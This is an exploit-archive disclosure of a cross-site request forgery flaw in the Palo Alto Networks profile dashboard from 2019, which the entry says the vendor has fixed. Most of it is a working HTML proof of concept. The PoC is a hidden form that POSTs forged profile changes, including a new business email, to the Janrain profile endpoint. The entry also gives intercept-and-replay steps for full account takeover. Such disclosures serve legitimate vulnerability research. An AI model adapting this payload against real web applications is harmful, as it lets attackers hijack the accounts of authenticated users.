Palo Alto Networks Cross Site Request Forgery

The user profile dashboard for paloaltonetworks.com suffered from a cross site request forgery vulnerability.


MD5 | 033bda102cbe55a0017caf9a1b421ed3

** Note : this vulnerability is already fixed by paloalto security team

# Exploit Title: Missing CSRF Token Leads to account full takeover (All
accounts can be hijacked)
# Google Dork: [N/A]
# Date: [JUl 23 2019]
# Exploit Author: Pankaj Kumar Thakur (Nepal) @Nep_1337_1998
# Vendor Homepage:https://www.paloaltonetworks.com
# Software Link: N/A
# Version: [8.0]
# Tested on: [Parrot OS]
# CVE : [N/A]
# Acknowledgement:
https://www.paloaltonetworks.com/security-researcher-acknowledgement

summary
----------
Cross-Site Request Forgery (CSRF) is an attack that forces an end user to
execute unwanted actions on a web application in which they're currently
authenticated. CSRF attacks specifically target state-changing requests,
not theft of data, since the attacker has no way to see the response to the
forged request.

Steps to generate
----------------------
>> Initially account should be authenticated

>> for testing purpose i changed email address ..and account was fully
takeover

if html files not works then follow this steps

>> go to profile setting

>> change your profile details

>> then intercept that request

>> then generate csrf poc and then try in browser..boom! account
cresdentials will be changed .


PoC
---

<html>
<!-- CSRF PoC -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="
https://paloaltonetworks.us.janraincapture.com/widget/profile.jsonp"
method="POST">
<input type="hidden" name="utf8" value="✓" />
<input type="hidden" name="access_token" value="m5xw97v7uy63yqw7"
/>
<input type="hidden" name="capture_screen" value="editProfile" />
<input type="hidden" name="js_version" value="d445bf4" />
<input type="hidden" name="capture_transactionId"
value="e3x68i8s4lth5131z1az1zv8nvj4s4laygi5o3m0" />
<input type="hidden" name="form" value="editProfileForm" />
<input type="hidden" name="flow" value="customstandardflow" />
<input type="hidden" name="client_id"
value="tcdjg4vtnnbm88w8g72x2ajxvxnb4rmm" />
<input type="hidden" name="redirect_uri"
value="http://localhost/" />
<input type="hidden" name="response_type" value="token" />
<input type="hidden" name="flow_version"
value="20190502085125375950" />
<input type="hidden" name="settings_version" value="" />
<input type="hidden" name="locale" value="en-US" />
<input type="hidden" name="recaptchaVersion" value="2" />
<input type="hidden" name="Salutation" value="" />
<input type="hidden" name="First_Name__c"
value="EMAIL_HIJACKED" />
<input type="hidden" name="Middle_Name__c" value="" />
<input type="hidden" name="Last_Name__c" value="test" />
<input type="hidden" name="suffix" value="" />
<input type="hidden" name="Email_Display_Name"
value="hpankajjj" />
<input type="hidden" name="Business_Email"
value="[email protected]" />
<input type="hidden" name="Personal_Email" value="" />
<input type="hidden" name="Business_Phone" value="9999999999" />
<input type="hidden" name="MobilePhone" value="" />
<input type="hidden" name="Company" value="AbeBooks" />
<input type="hidden" name="Title" value="" />
<input type="hidden" name="Job_Role__c"
value="Administrator" />
<input type="hidden" name="Job_Level__c" value="" />
<input type="hidden" name="Address1" value="" />
<input type="hidden" name="Address2" value="" />
<input type="hidden" name="City" value="" />
<input type="hidden" name="Zip_or_Postal_Code" value="" />
<input type="hidden" name="Country" value="India" />
<input type="hidden" name="Alt_State_Province__c"
value="" />
<input type="hidden" name="province" value="" />
<input type="hidden" name="Preferred_Communication" value="" />
<input type="hidden" name="language__c" value="en_US" />
<input type="hidden" name="location__c" value="India" />
<input type="hidden" name="BreachPrevention_hidden" value="" />
<input type="hidden" name="BYOD_hidden" value="" />
<input type="hidden" name="CloudSecurity_hidden" value="" />
<input type="hidden" name="Cybersecurity_hidden" value="" />
<input type="hidden" name="DataCenterVirtualization_hidden"
value="" />
<input type="hidden" name="EndpointSecurity_hidden" value="" />
<input type="hidden" name="Firewalls_hidden" value="" />
<input type="hidden" name="Mobility_hidden" value="" />
<input type="hidden" name="NetworkSecurity_hidden" value="" />
<input type="hidden" name="NetworkPerimeter_hidden" value="" />
<input type="hidden" name="NextGenerationFirewall_hidden"
value="" />
<input type="hidden" name="SaaSSecurity_hidden" value="" />
<input type="hidden" name="ThreatPrevention_hidden" value="" />
<input type="hidden"
name="subscribeToNewsAndProductUpdates_hidden" value="" />
<input type="hidden" name="subscribeToEventsAndWebinars_hidden"
value="" />
<input type="hidden"
name="subscribeToUnit42ThreatResearch_hidden" value="" />
<input type="hidden" name="tab1complete__c" value="true" />
<input type="hidden" name="tab2complete__c" value="false" />
<input type="hidden" name="tab3complete__c" value="false" />
<input type="hidden" name="tab4complete__c" value="false" />
<input type="hidden" name="tab5complete__c" value="false" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>


THANK YOU

PANKAJ KUMAR THAKUR

INDP.Security Researcher | Certified Ethical Hacker | Red Team at SYNACK
Inc | OSCP

Related Posts